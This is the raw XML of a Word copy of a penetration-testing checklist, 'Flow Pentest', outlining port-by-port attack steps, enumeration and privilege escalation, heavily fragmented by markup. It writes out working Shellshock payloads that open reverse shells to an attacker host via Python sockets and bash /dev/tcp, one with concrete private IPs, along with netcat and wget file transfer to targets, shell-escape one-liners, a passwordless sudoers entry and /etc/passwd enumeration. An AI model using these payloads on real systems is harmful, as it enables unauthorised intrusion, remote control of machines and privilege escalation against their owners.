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C7C5F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Flow Pentest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C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August 14, 2022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5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12:56 AM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C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C7C5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Scan of host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21 (FTP)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22 (SSH)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23 (Telnet)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25 (SMTP)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80 &amp; 443 (HTTP/S)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/robots.txt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source code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Scan with Nikto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If using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>proxy: Nikto –useproxy [proxyIPADDR]:port -h IPADDR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CGI-BIN discovered</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5F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Shellshock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="6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Test if vulnerable: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; /bin/bash -c ‘echo vulnerable’”  </w:t>
      </w:r>
      <w:hyperlink r:id="rId5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http://T</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>ARGETIPADDR/cgi-bin/status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> -e use_proxy=yes -e http_proxy=proxyIPADDR+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="6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$ wget -qO- -U “() { test;};echo \”Content-type: text/plain\”; echo; echo; /usr/bin/python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">\”HOSTIPADDR\”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\”/bin/sh\”,\”-i\”]);’ 2&gt;&amp;1″ -e use_proxy=yes -e http_proxy=PROXYIPADDR </w:t>
      </w:r>
      <w:hyperlink r:id="rId6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http://WEBSITEIP/cgi-bin/st</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>atus</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="6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Shell: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; /bin/bash -i &gt;&amp; /dev/tcp/HOSTIP/PORT 0&gt;&amp;1″  </w:t>
      </w:r>
      <w:hyperlink r:id="rId7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http://TARGETIPADDR/cgi-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:lastRenderedPageBreak/>
          <w:t>bin/status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> -e use_proxy=yes -e http_proxy=PROXYIPADDR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="6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curl -x </w:t>
      </w:r>
      <w:hyperlink r:id="rId8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http://192.168.1.9:3128</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H “User-Agent: () { ignored;};/bin/bash -i &gt;&amp; /dev/tcp/192.168.1.7/1234 0&gt;&amp;1” </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://192.168.1.9/cgi-bin/status</w:t>
        </w:r>
      </w:hyperlink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Dirbuster (GUI)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Login Form Di</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>scovered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Directory Traversal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Command Injection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File traverse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Test HTTP options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Upload file using Curl with if PUT option is available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Wget file via command injection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Activate shell file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MySQL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WordPress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Local File Inclusion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Remote Code Execution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all directories for usernames or potential passwords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Switch user agent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110 (POP3)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111 (RPCBind)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139/445 (SMB/RPC)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161 (SNMP)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1521 (Oracle)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3128 (Proxy)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Port 3306 (MySQL)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UNKNOWN PORT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NO PORTS LISTED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5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Enumeration &amp; Privile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ge Escalation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Run enumeration script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Transfer Files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By Netcat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on Host: nc -lvp PORT &lt; example.c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on target: nc -nv HOSTIP PORT &gt; example.c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By wget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wget IPADDR/example.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5F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start apache2 before hand</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5F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service apache2 restart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lastRenderedPageBreak/>
        <w:t>Escape limited shell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python -c ‘import pty;pty.spawn(“/bin/bash”)’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echo os.system(‘/bin/bash’)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/bin/sh -i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awk ‘BEGIN {system(“/bin/sh”)}’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find / -name blahblah ‘exec /bin/awk ‘BEGIN {system(“/bin/sh”)}’ \;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python: exit_code = os.system(‘/bin/sh’) output = os.popen(‘/bin/sh’).r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ead()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perl -e ‘exec “/bin/sh”;’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perl: exec “/bin/sh”;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ruby: exec “/bin/sh”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lua: os.execute(‘/bin/sh’)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irb(main:001:0&gt; exec “/bin/sh”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sensitive files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kernel version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distro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sudo privileges on non-root account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Add sudo privileges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U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SERNAME ALL=NOPASSWD; !/usr/bin/su, /bin/bash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passwords in config files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Which services are running by root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SUID binaries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Set SUID on file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Which files are world writeable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Service configurations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Scheduled cronjobs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Search for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>plain text usernames or passwords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for secondary interfaces &amp; networks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Check which languages are installed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How can files be uploaded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SSH keys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View bash history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Default password locations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MySQL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Enumerate localhost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Cracking Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5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 xml:space="preserve">Check for Password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>reuse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5F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enumerate users via cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C5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333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Misc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00CC7C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Lora" w:hAnsi="Lora" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: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https://anhtai.me/flow-pentest/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678EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F6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5F"/>
    <w:rsid w:val="00C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8CB5B-9CBF-419C-80DC-C094E7E7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:3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RGETIPADDR/cgi-bin/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ITEIP/cgi-bin/stat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RGETIPADDR/cgi-bin/status" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://anhtai.me/flow-pen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9/cgi-bin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2023-06-13T06:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-13T06:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>